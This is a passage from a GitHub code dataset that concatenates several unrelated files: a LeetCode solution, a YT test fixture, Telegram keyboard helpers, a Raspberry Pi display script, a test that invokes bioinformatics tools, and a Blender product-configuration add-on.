we start at the end and keep track of our biggest number yet\nwhen we find a number bigger than it we replace it with our previous max and then start using the new max.\n\"\"\"\n\n\ndef replaceElements(arr: list[int]) -> list[int]:\n\n _max = -1\n n = len(arr)\n\n for i in range(n - 1, -1, -1):\n tmp = arr[i]\n arr[i] = _max\n \n if tmp > _max:\n _max = tmp\n\n return arr","repo_name":"kennyhml/leetcode","sub_path":"easy/1299_replace_elements.py","file_name":"1299_replace_elements.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"87932539","text":"import pytest\n\nfrom yt import yson\nimport yt.wrapper as yt\n\nfrom yql_utils import yql_binary_path\n\nfrom crypta.graph.soup.config.python import EDGE_TYPE\nfrom crypta.graph.soupy_indevice.lib import config\n\nfrom crypta.graph.v1.python.v2.soup.soup_storage_yql_schema import SCHEMA\n\n\ndef create_table(ytc, path, schemadict):\n schemalist = []\n for typ, fields in schemadict.iteritems():\n for f in fields:\n schemalist.append({\"name\": f, \"type\": typ})\n\n schema = yson.YsonList(schemalist)\n schema.attributes[\"strict\"] = True\n ytc.create_table(path, attributes=dict(schema=schema), ignore_existing=True, recursive=True)\n\n\n@pytest.fixture(scope=\"module\")\ndef indevice_soup(request, yt_stuff):\n ytc = yt_stuff.get_yt_client()\n edge_types = [et for et in EDGE_TYPE.values() if et.Props.DeviceBounds == et.Props.INDEVICE]\n\n soup_dir = \"//soup/\"\n ytc.mkdir(soup_dir[:-1])\n\n schema = {\"string\": [\"id1\", \"id1Type\", \"id2\", \"id2Type\", \"sourceType\", \"logSource\"], \"any\": [\"dates\"]}\n for et in edge_types:\n tbl = soup_dir + EDGE_TYPE.name(et)\n create_table(ytc, tbl, schema)\n yt.set_attribute(tbl, \"_yql_row_spec\", SCHEMA)\n\n data = [\n (\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"mm_device_id\",\n \"baadbaad-baad-baad-baad-baadbaadbaad\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10666661500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-12\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10777771500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10888881500000000\",\n \"gaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"gaid\",\n \"abad1dea-abad-1dea-abad-1deaabad1dea\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"mm_device_id\",\n \"baadbaad-baad-baad-baad-baadbaadbaad\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10666661500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-12\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10777771500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10888881500000000\",\n \"oaid\",\n \"deadbeef-deaf-beef-dead-deadbeefdead\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-18\",\n ),\n (\n \"yandexuid\",\n \"10555551500000000\",\n \"oaid\",\n \"abad1dea-abad-1dea-abad-1deaabad1dea\",\n \"app-metrica-socket-android\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"idfa\",\n \"F00FF00F-F00F-F00F-F00F-F00FF00FF00F\",\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10111111500000000\",\n \"idfa\",\n \"F00FF00F-F00F-F00F-F00F-F00FF00FF00F\",\n \"app-metrica-socket-ios\",\n \"wl\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10222221500000000\",\n \"idfa\",\n \"F00FF00F-F00F-F00F-F00F-F00FF00FF00F\",\n \"app-metrica-socket-ios\",\n \"wl\",\n \"2018-12-06\",\n \"2018-12-12\",\n ),\n (\n \"gaid\",\n \"aaaaaaaa-aaaa-aaaa-aaaa-111111111111\",\n \"mm_device_id\",\n \"bbbbbbbb-bbbb-bbbb-bbbb-222222222222\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"gaid\",\n \"aaaaaaaa-aaaa-aaaa-aaaa-111111111111\",\n \"mm_device_id\",\n \"cccccccc-cccc-cccc-cccc-333333333333\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"gaid\",\n \"aaaaaaaa-aaaa-aaaa-aaaa-111111111111\",\n \"mm_device_id\",\n \"dddddddd-dddd-dddd-dddd-444444444444\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"yandexuid\",\n \"10777771500000000\",\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"access-yp-did\",\n \"access\",\n \"2018-12-02\",\n \"2018-12-02\",\n ),\n (\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"uuid\",\n \"123456789012345678901234567890ab\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"uuid\",\n \"cd123456789012345678901234567890\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n (\n \"mm_device_id\",\n \"DABBAD00-DABB-AD00-DABB-AD00DABBAD00\",\n \"uuid\",\n \"1234567890de12345678901234567890\",\n \"app-metrica\",\n \"mm\",\n \"2018-12-01\",\n \"2018-12-12\",\n ),\n ]\n\n for d in data:\n tbl_name = soup_dir + \"{}_{}_{}_{}\".format(d[0], d[2], d[4], d[5])\n yt.write_table(\n yt.TablePath(tbl_name, append=True),\n [\n {\n \"id1Type\": d[0],\n \"id1\": d[1],\n \"id2Type\": d[2],\n \"id2\": d[3],\n \"sourceType\": d[4],\n \"logSource\": d[5],\n \"dates\": [d[6], d[7]],\n }\n ],\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef idstorage(request, yt_stuff):\n ytc = yt_stuff.get_yt_client()\n\n browser_schema = {\n \"string\": [\n \"id_type\",\n \"id\",\n \"os_family\",\n \"os_version\",\n \"browser_name\",\n \"os_name\",\n \"browser_version\",\n \"date_begin\",\n \"date_end\",\n ],\n \"boolean\": [\"is_emulator\", \"is_touch\", \"is_browser\", \"is_robot\", \"is_tv\", \"is_tablet\", \"is_mobile\"],\n }\n\n device_schema = {\n \"string\": [\"id_type\", \"id\", \"date_begin\", \"date_end\", \"os_version\", \"os\", \"manufacturer\", \"model\"],\n \"int64\": [\"screen_height\", \"screen_width\"],\n }\n\n app_schema = {\n \"string\": [\"id_type\", \"id\", \"date_begin\", \"date_end\", \"os\", \"app_version\", \"app_id\"],\n \"any\": [\"api_keys\"],\n }\n\n idstorage_dir = \"//idstorage/\"\n\n for idt in [\"yandexuid\", \"icookie\"]:\n table = \"{}{}/eternal\".format(idstorage_dir, idt)\n create_table(ytc, table, browser_schema)\n\n browsers = [\n (\"10111111500000000\", \"somebrowser\", \"7.0\", True),\n (\"10222221500000000\", \"somebrowser\", \"7.0\", True),\n (\"10555551500000000\", \"somebrowser\", \"7.0\", True),\n (\"10666661500000000\", \"somebrowser\", \"7.0\", True),\n (\"10777771500000000\", \"otherbrowser\", \"7.0\", True),\n (\"10888881500000000\", \"somebrowser\", \"7.0\", False),\n ]\n\n yt.write_table(\n table,\n [dict(id_type=idt, id=b[0], browser_name=b[1], browser_version=b[2], is_browser=b[3]) for b in browsers],\n )\n\n devices = {\n \"gaid\": [(\"abad1dea-abad-1dea-abad-1deaabad1dea\", \"ACME\", \"Emulator\")],\n \"oaid\": [(\"abad1dea-abad-1dea-abad-1deaabad1de1\", \"ACME\", \"Emulator\")],\n \"idfa\": [],\n \"mm_device_id\": [\n (\"bbbbbbbb-bbbb-bbbb-bbbb-222222222222\", \"ACME\", \"PhoneOne\"),\n (\"cccccccc-cccc-cccc-cccc-333333333333\", \"ACME\", \"PhoneTwo\"),\n (\"dddddddd-dddd-dddd-dddd-444444444444\", \"ACME\", \"PhoneThree\"),\n ],\n }\n\n apps = {\n (\"123456789012345678901234567890ab\", \"android\", \"com.acme.app1\", \"1.1\"),\n (\"cd123456789012345678901234567890\", \"android\", \"com.acme.app1\", \"1.1\"),\n (\"1234567890de12345678901234567890\", \"android\", \"com.acme.app1\", \"2.2\"),\n }\n\n for idt in [\"idfa\", \"gaid\", \"oaid\", \"mm_device_id\"]:\n table = \"{}{}/eternal\".format(idstorage_dir, idt)\n create_table(ytc, table, device_schema)\n yt.write_table(table, [dict(id_type=idt, id=d[0], manufacturer=d[1], model=d[2]) for d in devices[idt]])\n\n uuid_tbl = \"{}uuid/eternal\".format(idstorage_dir)\n create_table(ytc, uuid_tbl, app_schema)\n yt.write_table(uuid_tbl, [dict(id_type=\"uuid\", id=a[0], os=a[1], app_id=a[2], app_version=a[3]) for a in apps])\n\n\n@pytest.fixture(scope=\"module\")\ndef indevice_conf(request, yt_stuff):\n config.YT_PROXY = yt_stuff.get_server()\n config.MRJOB_PATH = yql_binary_path(\"yql/tools/mrjob/mrjob\")\n config.UDF_RESOLVER_PATH = yql_binary_path(\"yql/tools/udf_resolver/udf_resolver\")\n config.UDFS_DIR = \";\".join([yql_binary_path(\"yql/udfs\"), yql_binary_path(\"ydb/library/yql/udfs\")])\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/tests/conftest (5).py","file_name":"conftest (5).py","file_ext":"py","file_size_in_byte":10723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30256287919","text":"from typing import Any, Sequence, Type\n\nfrom aiogram.filters.callback_data import CallbackData\nfrom aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom .callback_data import PaginationCallbackData\n\n\ndef inline_keyboard_pagination(\n elements: Sequence[InlineKeyboardButton],\n page: int,\n page_count: int,\n callback_type: Type[PaginationCallbackData],\n callback_extra_args: dict[str, Any] | None = None,\n columns: int = 1,\n back_callback: CallbackData | None = None,\n add_callback: CallbackData | None = None,\n) -> InlineKeyboardMarkup:\n callback_extra_args = callback_extra_args or {}\n keyboard = [list(elements[i:i + columns]) for i in range(0, len(elements), columns)]\n if add_callback is not None:\n keyboard.insert(0, [InlineKeyboardButton(text=\"Добавить\", callback_data=add_callback.pack())])\n pagination_row = [InlineKeyboardButton(\n text=str(page),\n callback_data=callback_type(**callback_extra_args, page=page).pack(),\n )]\n if page > 1:\n pagination_row.insert(\n 0,\n InlineKeyboardButton(\n text=f\"< {page - 1}\",\n callback_data=callback_type(**callback_extra_args, page=page - 1).pack(),\n ),\n )\n if page < page_count:\n pagination_row.append(\n InlineKeyboardButton(\n text=f\"{page + 1} >\",\n callback_data=callback_type(**callback_extra_args, page=page + 1).pack(),\n ),\n )\n if len(pagination_row) > 1:\n keyboard.append(pagination_row)\n if back_callback is not None:\n keyboard.append([InlineKeyboardButton(text=\"Назад\", callback_data=back_callback.pack())])\n\n return InlineKeyboardMarkup(inline_keyboard=keyboard)\n\n\ndef generate_full_name(first_name: str | None, last_name: str | None) -> str:\n first_name = first_name or \"\"\n last_name = last_name or \"\"\n return f\"{first_name} {last_name}\".strip()\n","repo_name":"OlegYurchik/dresscode_bot","sub_path":"dresscode_bot/services/telegram/handlers/dialog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9772938686","text":"import RPi.GPIO as GPIO\n\nimport time\nfrom math import sqrt; from itertools import count, islice\n\nfrom output_pin import OutputPin\nfrom input_pin import InputPin\n\nprint('Initializing...')\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n\"\"\" The ports for the SSD, in order of pin connection on the board.\n There is one port per segment, and one for the dot, for a total of 8.\n\"\"\"\nports = [26, 19, 6, 5, 21, 20, 12, 25]\n\n\"\"\" These ports seem to cause the SSD to just go dark when the pins are high,\n no matter what the other pins are. We just make sure they get set to low\n on init and don't get touched after that.\n\"\"\"\nbad_ports = [13, 16]\n\nzero = [0, 1, 1, 1, 1, 1, 1, 0]\none = [0, 0, 0, 1, 0, 0, 1, 0]\ntwo = [1, 0, 1, 1, 1, 1, 0, 0]\nthree = [1, 0, 1, 1, 0, 1, 1, 0]\nfour = [1, 1, 0, 1, 0, 0, 1, 0]\nfive = [1, 1, 1, 0, 0, 1, 1, 0]\nsix = [1, 1, 1, 0, 1, 1, 1, 0]\nseven = [0, 0, 1, 1, 0, 0, 1, 0]\neight = [1, 1, 1, 1, 1, 1, 1, 0]\nnine = [1, 1, 1, 1, 0, 1, 1, 0]\ndigits = [zero, one, two, three, four, five, six, seven, eight, nine]\n\nbutton = InputPin(17)\nled = OutputPin(4, False)\n\nfor port in ports:\n GPIO.setup(port, GPIO.OUT)\nfor bad_port in bad_ports:\n GPIO.setup(bad_port, GPIO.OUT)\n GPIO.output(bad_port, GPIO.LOW)\n\ndef print_num(number_array):\n for idx in range(len(ports)):\n bins = [True if int(i) else False for i in number_array]\n GPIO.output(ports[idx], GPIO.HIGH if bins[idx] else GPIO.LOW)\n\ndef is_prime(n):\n return n > 1 and all(n%i for i in islice(count(2), int(sqrt(n)-1)))\n\n\ncounter = 0\nprint_num(zero)\nwhile True:\n button.wait_for_edge(GPIO.FALLING, bouncetime=300)\n print_num(digits[counter])\n led.set_status(is_prime(counter))\n counter = (counter + 1) % 10\n \n \n \n \n","repo_name":"awjc/RpiPlayground","sub_path":"seven_segment_display.py","file_name":"seven_segment_display.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7269385277","text":"import unittest\nimport os\nimport subprocess\n\nclass TestCallExternalApplications(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n print(\"!?\")\n\n def test_call_samtools_from_path(self):\n call = subprocess.Popen(\"samtools\", stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell=True)\n msg = call.communicate()\n self.assertTrue(call.returncode == 1, \"Failed to call `samtools` from shell\\n\\n %r\" % (msg,))\n\n def test_call_snpeff_from_environment(self):\n self.assertTrue(\"SNPEFF_PATH\" in os.environ, \"Could not find environmental variable $SNPEFF_PATH to find snpEff's install directory\")\n snpeff_path = os.environ['SNPEFF_PATH'] \n call = subprocess.Popen(\"java -Xmx2g -jar \" + snpeff_path + os.sep + \"snpEff.jar -h\", stdout = subprocess.PIPE, \n stderr = subprocess.PIPE, shell=True)\n msg = call.communicate()\n self.assertTrue(call.returncode == 255, \"Failed to call `%s` from shell using environmental variable $SNPEFF_PATH.\\n\\n %r\" % \n (\"java -Xmx2g -jar \" + snpeff_path + os.sep + \"snpEff.jar\", msg))\n\n def test_call_blastp_from_path(self):\n call = subprocess.Popen(\"blastp -h\", stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell=True)\n msg = call.communicate()\n self.assertTrue(call.returncode == 0, \"Failed to call `blastp` from shell.\\n\\n %r\" % (msg,))\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"PathoScope/PathoVar","sub_path":"tests/test_installed_components.py","file_name":"test_installed_components.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20945401770","text":"import ast\r\nimport contextlib\r\nimport fnmatch\r\nimport json\r\nimport os\r\nimport re\r\nimport sqlite3\r\nfrom pathlib import Path\r\n\r\n# from icecream import ic\r\nimport bpy\r\nimport pandas as pd\r\nfrom database.aqua_database import conexao_banco_local\r\nfrom addons.install_modules import CaixaMensagemPM\r\nfrom bpy_plus.file_system import Path\r\nfrom classes.aqua_classes import Colecoes\r\n\r\nfrom database.aqua_obj_props import select_codpro\r\n\r\nfrom funcoes.aqua_funcoes import caminhos_pastas, painel_aviso, conexao_banco\r\nfrom funcoes.aqua_database import conexao_banco_local\r\n\r\npm_produtos = conexao_banco_local()[0]\r\n\r\n\r\ndef lista_derivacoes_items(self, context):\r\n lista_derivacoes_items = []\r\n\r\n for produto in tuple(select_codpro()):\r\n print(produto)\r\n\r\n lista_derivacoes_items.append((produto[1], produto[1], produto[1]))\r\n\r\n return lista_derivacoes_items\r\n\r\n\r\ndef preencher_dados(self, context):\r\n bpy.context.scene.propriedades_derivacao.clear()\r\n for produto in tuple(select_codpro()):\r\n bpy.context.scene.propriedades_derivacao.add().derivacao = str(produto[1])\r\n bpy.context.object.aqua.nome = str(produto[0])\r\n bpy.context.object.aqua.peso = float(produto[4])\r\n\r\n bpy.context.scene.propriedades_derivacao_selecionada.clear()\r\n for der in bpy.context.object.aqua_cores.keys():\r\n bpy.context.scene.propriedades_derivacao_selecionada.add().derivacao_selecionada = (\r\n der\r\n )\r\n\r\n\r\ndef lista_derivacao(self, context):\r\n obj = bpy.context.object\r\n tipo = obj.aqua.tipo_derivacao\r\n lista_derivacao = []\r\n lista_derivacao.clear()\r\n\r\n return [\r\n (\"05_unica\", \"05_unica\", \"\")\r\n if tipo == \"05_unica\"\r\n else (item, item.split(\"_\")[1], \"\")\r\n for item in obj.aqua_cores.keys()\r\n if item not in lista_derivacao and obj.type == \"MESH\"\r\n ]\r\n\r\n\r\ndef update_derivacao(self, context):\r\n obj = bpy.context.object\r\n tipo = obj.aqua.tipo_derivacao\r\n\r\n obj.aqua.leitura_derivacao = \"\"\r\n\r\n if tipo == \"10_cores\":\r\n if obj.aqua.derivacao != \"98_sortida\":\r\n obj.active_material = bpy.data.materials[obj.aqua.derivacao]\r\n\r\n elif tipo == \"20_tam mad plast\":\r\n val_derivacao = float(obj.aqua.derivacao.split(\"_\")[1].split(\" \")[0])\r\n obj.dimensions.z = val_derivacao / 100\r\n\r\n obj.aqua.leitura_derivacao = obj.aqua.derivacao\r\n # if (\r\n # not (\r\n # obj.aqua.nome.startswith(f\"COLUNA {bpy.context.scene.cena.ancoragem}\")\r\n # or obj.aqua.nome.startswith(\"COLUNA MAD PLAST\")\r\n # )\r\n # and obj.hide_viewport == False\r\n # ):\r\n # print(f\"{str(obj.aqua.nome)} -:- {str(obj.aqua.derivacao)}\")\r\n\r\n # obj_importador = {obj.aqua.codigo: [obj.aqua.nome, obj.aqua.derivacao]}\r\n # dataframe = pd.DataFrame.from_dict(\r\n # obj_importador, orient=\"index\", columns=[\"ITEM\", \"DERIVACAO\"]\r\n # )\r\n # print(dataframe)\r\n\r\n\r\ndef update_altura(self, context):\r\n bpy.context.object.location.z = bpy.context.object.aqua.altura\r\n\r\n\r\ndef update_cor_personalizada(self, context):\r\n material = bpy.data.materials[\"99_colorida\"].node_tree\r\n\r\n\r\ndef update_cor_metal_personalizada(self, context):\r\n print(\"COR DO METAL PERSONALIZADO\")\r\n\r\n\r\ndef atualizar_cor_metal(self, context):\r\n obj = bpy.context.object\r\n cor_nova = obj.aqua.cor_metal\r\n obj.active_material = bpy.data.materials[cor_nova]\r\n\r\n print(f\"COR METAL ATUALIZADO: {cor_nova}\")\r\n\r\n\r\ndef remove_mat_duplicados():\r\n material_names = set()\r\n\r\n for obj in bpy.data.objects:\r\n for slt in obj.material_slots:\r\n material_name = slt.name.split(\".\")[0]\r\n if material_name in bpy.data.materials:\r\n slt.material = bpy.data.materials.get(material_name)\r\n material_names.add(material_name)\r\n\r\n for m in bpy.data.materials:\r\n material_name = m.name.split(\".\")[0]\r\n if material_name.isnumeric() and material_name not in material_names:\r\n bpy.data.materials.remove(m)\r\n\r\n\r\ndef query_colunas_furos_avulsas():\r\n pm_produtos = conexao_banco()[0]\r\n \"\"\"\r\n Executes a SQL query to retrieve the product code and description from the 'tb_produtos' table in the database.\r\n The query selects the rows where the product code starts with '240' and orders them by the product code.\r\n\r\n Parameters:\r\n None\r\n\r\n Returns:\r\n query_colunas_dict_ (dict): A dictionary where the keys are product codes and the values are lists containing\r\n the product description, the size of the column, the type of lid, the anchoring, and the column hole.\r\n \"\"\"\r\n\r\n pm_produtos.execute(\r\n \"\"\"\r\n select\r\n produtos.codpro, produtos.despro\r\n from tb_produtos as produtos\r\n where produtos.codpro like ('240%')\r\n order by produtos.codpro\r\n \"\"\"\r\n )\r\n\r\n query_colunas = pm_produtos.fetchall()\r\n query_colunas_avulsos = []\r\n query_colunas_avulsos.extend(query_colunas)\r\n query_colunas_dict_ = {}\r\n\r\n for coluna_ in query_colunas_avulsos:\r\n tam_col = coluna_[1].split(\" \")[2]\r\n tampa = coluna_[1].split(\"- \")[-1]\r\n ancoragem = coluna_[1].split(\" \")[1]\r\n furo_coluna = coluna_[1].split(\" - \")[1]\r\n query_colunas_dict_.update(\r\n {coluna_[0]: [coluna_[1], tam_col, tampa, ancoragem, furo_coluna]}\r\n )\r\n\r\n return query_colunas_dict_\r\n\r\n\r\ndef selecionar_objetos_por_nome(obj_name):\r\n \"\"\"\r\n Selects an object in Blender by its name.\r\n\r\n Parameters:\r\n obj_name (str): The name of the object to be selected.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n bpy.ops.object.select_all(action=\"DESELECT\") # Deselect all objects\r\n obj = bpy.data.objects[obj_name] # Get the object\r\n obj.select_set(True) # Select the object\r\n bpy.context.view_layer.objects.active = obj # Set the object as active\r\n\r\n\r\ndef report_furos_coluna(torre):\r\n \"\"\"Tamanho Madeira Plástica - Altura Plataforma - Aterramento + 5 = Altura Furo\"\"\"\r\n \"\"\"Tamanho Madeira Plástica - Altura Furo - Aterramento + 5 = Altura Plataforma\"\"\"\r\n nome_coluna = \"\"\r\n fix = bpy.context.scene.cena.ancoragem\r\n alt_plat = 0\r\n tam_col = \"\"\r\n tampa = \"\"\r\n if bpy.context.scene.cena.ancoragem == \"NENHUM\":\r\n painel_aviso(\"Selecione uma fixação\", \"Erro\", \"ERROR\")\r\n else:\r\n for obj in bpy.context.scene.objects:\r\n if (\r\n obj.name_full.find(\"COLUNA MAD PLAST\") != -1\r\n and obj.hide_viewport == False\r\n ):\r\n # SELECIONAR E ATIVAR OBJETO\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n for objetos in bpy.data.collections[torre].objects:\r\n if (\r\n objetos.name_full.startswith(\"GUIA_PLATAFORMA\")\r\n and round(objetos.location.z, 2) != 0.1\r\n and objetos.hide_viewport == False\r\n ):\r\n alt_plat = round(\r\n bpy.context.scene.objects[objetos.name].location.z * 100\r\n )\r\n print(alt_plat)\r\n\r\n for coluna in bpy.data.collections[torre].objects:\r\n if (\r\n coluna.name_full.startswith(\"COLUNA MAD PLAST\")\r\n and coluna.hide_viewport == False\r\n ):\r\n tam_col = coluna.aqua.derivacao.split(\"_\")[-1].split(\" \")[0]\r\n\r\n child_col = []\r\n child_col.clear()\r\n\r\n child_col = [\r\n chld.name.split(\".\")[0]\r\n for chld in coluna.children_recursive\r\n if chld.name.split(\".\")[0]\r\n not in (\"L PEQUENO GALV\", \"COQUEIRO M1\")\r\n ]\r\n\r\n tampa = \"COM TAMPA\" if len(child_col) > 1 else \"SEM TAMPA\"\r\n anc = 0 if fix == \"PISO\" else 10\r\n\r\n for codigo, colunas in query_colunas_furos_avulsas().items():\r\n alt_furo = re.sub(r\"[^0-9]\", \"\", colunas[4])\r\n if alt_furo.isdigit() == True:\r\n alt_furo_ = (\r\n int(tam_col) - int(alt_furo) - int(anc) + 5\r\n ) #\r\n nome_coluna_ = f\"{coluna.name.split(' MAD')[0]} {fix} {tam_col} CM - {alt_furo} CM - {tampa}\"\r\n\r\n if (\r\n int(colunas[1]) == int(tam_col)\r\n and tampa == colunas[2]\r\n and fix == colunas[3]\r\n and int(alt_furo_) == int(alt_plat)\r\n and objetos.hide_viewport == False\r\n ):\r\n coluna.aqua.codigo = str(codigo)\r\n coluna.aqua.nome = nome_coluna_\r\n\r\n print(codigo, colunas[0], \" -->\", coluna.name)\r\n\r\n return nome_coluna\r\n\r\n\r\ndef ajustar_derivacao_colunas(torre):\r\n \"\"\"\r\n This function adjusts the derivation of columns based on specific conditions.\r\n\r\n Parameters:\r\n - torre: The name of the tower.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n cobertura = False\r\n acesso = False\r\n alt_plat = 0\r\n col_der = \"10_82 CM\" # INT APENAS PARA DAR ERRO - \"10_82 CM\"\r\n fix = bpy.context.scene.cena.ancoragem\r\n\r\n lista_colunas = [\r\n col.name\r\n for col in bpy.data.collections[torre].objects\r\n if col.aqua.codigo # TODO FAZER QUERY NAS COLUNAS PARA SEMPRE TER OS DADOS ATUALIZADOS\r\n in [\r\n \"2402400001\",\r\n \"2402400002\",\r\n \"2402400003\",\r\n \"2402400004\",\r\n \"2402400005\",\r\n \"2402400006\",\r\n \"2402400007\",\r\n \"2402400008\",\r\n \"2402400009\",\r\n \"2402400010\",\r\n \"2402400011\",\r\n \"2402400012\",\r\n \"2402400013\",\r\n \"2402400014\",\r\n \"2402400015\",\r\n \"2402400016\",\r\n \"2402400017\",\r\n \"2402400018\",\r\n \"2402400019\",\r\n \"2402400020\",\r\n \"2402400021\",\r\n \"2402400022\",\r\n \"2402400023\",\r\n \"2402400024\",\r\n \"2402400025\",\r\n \"2402400026\",\r\n \"2402400027\",\r\n \"2402400028\",\r\n \"2402400029\",\r\n \"2402400030\",\r\n \"2402400031\",\r\n \"2402400032\",\r\n \"2402400033\",\r\n \"2402400034\",\r\n \"2402400035\",\r\n \"2402400036\",\r\n \"2402400037\",\r\n \"2402400038\",\r\n \"2402400039\",\r\n \"2402400040\",\r\n \"2402400041\",\r\n \"2402400042\",\r\n \"2402400043\",\r\n \"2402400044\",\r\n \"2402400045\",\r\n \"2402400046\",\r\n \"2402400047\",\r\n \"2402400048\",\r\n \"2402400049\",\r\n \"2402400050\",\r\n \"2402400051\",\r\n \"2402400052\",\r\n \"2402400053\",\r\n \"2402400054\",\r\n \"2402400055\",\r\n \"2402400056\",\r\n \"2402400057\",\r\n \"2402400058\",\r\n \"2402400059\",\r\n \"2402400060\",\r\n \"2402400061\",\r\n \"2402400062\",\r\n \"2402400063\",\r\n \"2402400064\",\r\n \"40410001\",\r\n ]\r\n if not (col[\"COLUNA_CUSTOM\"] == 1)\r\n ]\r\n\r\n for plataforma in bpy.data.collections[torre].objects:\r\n if (\r\n plataforma.name_full.startswith(\"GUIA_PLATAFORMA\")\r\n and round(plataforma.location.z, 2) != 0.1\r\n ):\r\n alt_plat = round(bpy.context.scene.objects[plataforma.name].location.z, 2)\r\n\r\n # DETECTAR TOLDO E ACESSO\r\n for filhos in plataforma.children:\r\n if (filhos.aqua.nome.startswith(\"TOLDO\")) == True:\r\n cobertura = True\r\n if filhos.aqua.nome.startswith(\"ACESSO M1\") == True:\r\n acesso = True\r\n\r\n # ATUALIZAR \"L\"\r\n for obj in bpy.context.scene.objects:\r\n for prop in obj.keys():\r\n if prop == \"AQUA_L\":\r\n if fix == \"PISO\":\r\n obj[\"AQUA_L\"] = 1\r\n obj.update_tag()\r\n\r\n elif fix == \"TERRA\":\r\n obj[\"AQUA_L\"] = 0\r\n obj.update_tag()\r\n\r\n for coluna in lista_colunas:\r\n if cobertura == False: # ESSA DEVE SER A PRIMEIRA CONDIÇÃO\r\n col_der = \"80_230 CM\"\r\n\r\n if alt_plat == 0.45:\r\n col_der = \"80_230 CM\"\r\n\r\n if alt_plat == 1.6:\r\n col_der = \"120_300 CM\"\r\n\r\n if alt_plat in [0.4, 0.8]:\r\n if acesso == False:\r\n col_der = \"80_230 CM\"\r\n\r\n elif acesso == True:\r\n col_der = \"90_250 CM\"\r\n\r\n if cobertura == True:\r\n # print(\"===========\")\r\n # print(alt_plat)\r\n\r\n if alt_plat == 1.0:\r\n col_der = \"90_250 CM\"\r\n\r\n if acesso == True:\r\n col_der = \"100_270 CM\"\r\n if fix == \"TERRA\":\r\n col_der = \"110_280 CM\"\r\n\r\n elif alt_plat == 1.2:\r\n col_der = \"100_270 CM\"\r\n if fix == \"TERRA\":\r\n col_der = \"110_280 CM\"\r\n\r\n if acesso == True:\r\n col_der = \"120_300 CM\"\r\n\r\n # AJUSTAR DERIVACAO\r\n\r\n 